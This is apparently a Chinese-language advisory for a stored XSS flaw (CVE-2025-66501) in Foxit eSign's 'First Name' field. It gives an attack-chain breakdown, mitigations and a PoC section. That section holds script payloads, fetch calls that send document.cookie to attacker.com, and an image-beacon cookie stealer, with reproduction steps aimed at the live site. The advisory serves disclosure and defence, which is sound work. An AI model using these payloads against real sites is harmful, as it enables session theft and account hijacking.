CVE-2025-66501 Foxit eSign存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66501

漏洞类型

存储型XSS

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

pdfonline.foxit.com - Foxit eSign

漏洞概述

CVE-2025-66501是Foxit eSign产品中存在的一个存储型跨站脚本(XSS)漏洞，CVSS评分为6.3，属于中危级别。该漏洞位于pdfonline.foxit.com的Predefined Text功能中，攻击者可以通过身份信息的"First Name"字段注入恶意脚本代码。由于该字段内容在存储时未进行充分的输入验证和输出编码，恶意payload会被永久存储在服务器端。当其他用户使用预定义文本功能或查看文档属性时，存储的恶意脚本会被渲染到页面DOM中执行，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。此漏洞需要低权限用户即可实施，且需要受害者进行一定交互才能触发。

技术细节

该存储型XSS漏洞源于Foxit eSign的Predefined Text功能对用户输入的"First Name"字段缺乏适当的输入验证和输出编码。攻击者首先在账户注册或编辑身份信息时，在"First Name"字段中注入恶意XSS payload（如：<script>alert(document.cookie)</script>）。由于后端未对该字段进行安全过滤，payload被直接存储到数据库中。当其他用户访问使用预定义文本的文档或查看包含该身份信息的文档属性时应用程序从数据库读取并直接将数据渲染到HTML页面中，未经任何转义处理。浏览器接收到包含恶意脚本的页面后执行其中的JavaScript代码。攻击者可以利用此漏洞窃取受害者的认证令牌、进行钓鱼攻击或在受害者权限下执行操作。由于是存储型XSS，攻击只需一次注入即可影响所有访问该内容的用户。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统为Foxit eSign (pdfonline.foxit.com)，确认存在Predefined Text功能和First Name输入字段

STEP 2

Initial Access

攻击者注册Foxit eSign账户或使用已有低权限账户访问身份信息编辑页面

STEP 3

Payload Injection

在身份信息的First Name字段中注入恶意XSS payload，如<script>alert(document.cookie)</script>

STEP 4

Persistence

恶意payload被存储到数据库中，由于应用未进行输入验证，payload永久保存在服务器端

STEP 5

Trigger

受害者访问使用Predefined Text的文档或查看包含攻击者身份信息的文档属性

STEP 6

Execution

应用程序从数据库读取数据并直接渲染到HTML页面，浏览器执行存储的恶意JavaScript代码

STEP 7

Impact

攻击者成功窃取受害者会话cookie、劫持账户或在受害者上下文中执行任意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-66501 Stored XSS PoC -->
<!-- Payload injection via First Name field -->
<script>alert(document.domain)</script>

<!-- Alternative payloads -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- Steps to reproduce:
1. Navigate to pdfonline.foxit.com
2. Register or edit account identity settings
3. In the "First Name" field, inject the XSS payload
4. Save the changes
5. Create or view a document using Predefined Text feature
6. Observe the XSS payload execution when viewing document properties -->

<!-- Real attack payload example -->
<script>
  // Cookie stealing payload
  var img = new Image();
  img.src = 'https://attacker-controlled-server/collect?c=' + encodeURIComponent(document.cookie) + '&d=' + encodeURIComponent(document.domain);
  document.body.appendChild(img);
</script>

影响范围

Foxit eSign - Predefined Text功能所有版本（具体版本需参考官方安全公告）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 禁用或限制Predefined Text功能的使用；2) 对所有用户输入实施严格的输入过滤，移除或转义HTML标签和JavaScript相关字符；3) 启用Content-Security-Policy响应头限制内联脚本执行；4) 对敏感操作启用双因素认证以防止账户被劫持后进行关键操作；5) 监控日志中的异常XSS攻击特征并设置告警。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66501
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66501
3 Details https://www.cvedetails.com/cve/CVE-2025-66501/
4 VulDB https://vuldb.com/cve/CVE-2025-66501
5 Link https://www.foxit.com/support/security-bulletins.html